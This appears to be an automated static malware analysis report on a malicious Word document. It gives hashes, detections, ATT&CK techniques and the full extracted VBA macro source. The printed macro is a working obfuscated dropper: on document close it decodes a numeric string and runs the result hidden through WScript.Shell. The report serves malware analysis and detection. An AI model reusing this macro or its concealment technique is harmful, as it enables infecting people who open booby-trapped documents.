Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d8f73e616842ea74…

MALICIOUS

Office (OOXML)

36.8 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-01-12
MD5: 1a292f55814ef9e1f70049df9334fb57 SHA-1: 93ce5a6a664312b6486d000077fcdebe3fbddb9a SHA-256: d8f73e616842ea745a15959c217dd383dd41cd0f706035759d40e5ea1ffdacce
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OOXML document containing VBA macros. The macros utilize WScript.Shell to execute a command, likely to download and run a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6386548-0' further supports its role as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6386548-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6386548-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(conferma) < 4774 Then
    CreateObject("WScript.Shell").Run conferma, vbHide * 4
  End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(conferma) < 4774 Then
    CreateObject("WScript.Shell").Run conferma, vbHide * 4
  End If
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2657 bytes
SHA-256: 3518c27c97f0688ae42b7196aeaa7573507d3b3056f1e4373ade31f70e98bcce
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function folgore(ByVal deforme As Integer) As String
 ceto = Array("?", "E", "z", "=", "s", ",", "a", "P", "V", "\", "j", ":", "(", "i", ".", "w", ";", "x", "o", "p", "-", "k", "l", "M", "S", "g", "B", "O", "D", "W", "N", "+", "'", "e", "A", "c", "q", ")", "f", "F", "T", "d", "y", "$", "v", "h", "n", "b", "m", "r", " ", "/", "C", "t")
 Dim aforisma As Integer
 
 For aforisma = LBound(ceto) To UBound(ceto)
   If aforisma = deforme Then
    folgore = ceto(aforisma)
   End If
 Next
 
End Function


Public Function prolunga(conferma As String)
  If Len(conferma) < 4774 Then
    CreateObject("WScript.Shell").Run conferma, vbHide * 4
  End If
End Function

Sub Document_Close()
 feralo = fulmine("19181533490445332222502030180117135350200117333550264219060404502052184848064641501230331520274710333553502442045333481430335314293347522213334653371428181546221806413913223312324553531911515118213836134745021735020241361015463641143518485124245153064621042114220248320550433346441134070728344034503150320906454228232708191433173332371650245306495320074918353304045043334644113407072834403432090645422823270819143317333216501230331520274710333553502442045333481430335314293347522213334653371428181546221806412453491346251232455353191151511821383613474502173502024136101546364114351848510414194519001341035306462104213237")
 Application.Run "prolunga", feralo
End Sub

Function esoso(ByVal qualcosa, ByVal latino) As String
 
 porfido = LTrim(vbNullString) & vbNullString
 avviso = Array(qualcosa, latino)
 
 For tombola = 0 To UBound(avviso)
   porfido = porfido + vbNullString + avviso(tombola) + vbNullString
 Next
 
 esoso = porfido
End Function

Function fulmine(Optional notizia As String, Optional notizia2)
  periodo = cloro(notizia)
  persuaso = Trim(vbNullString) & vbNullString

  For aforisma = 0 To Len(notizia)
    If (aforisma + 1) <= UBound(periodo) Then
    saltare = periodo(aforisma + 1)
    bulbo = periodo(aforisma)
    chiaro = Int(bulbo + saltare)
    resa = folgore(chiaro)
    persuaso = esoso(persuaso, resa)
    aforisma = aforisma + 1
    End If
  Next
  
  fulmine = persuaso
End Function


Function cloro(cesoia As String, Optional sorpasso As Integer) As Variant
    cloro = Split(Left(StrConv(cesoia, vbUnicode), Len(StrConv(cesoia, vbUnicode)) - 1), vbNullChar)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12800 bytes
SHA-256: 494e65c419f312c07678524f1986c1373b80651fd32c1d339f0fe93541baaeef
Detection
ClamAV: Doc.Dropper.Agent-6386548-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.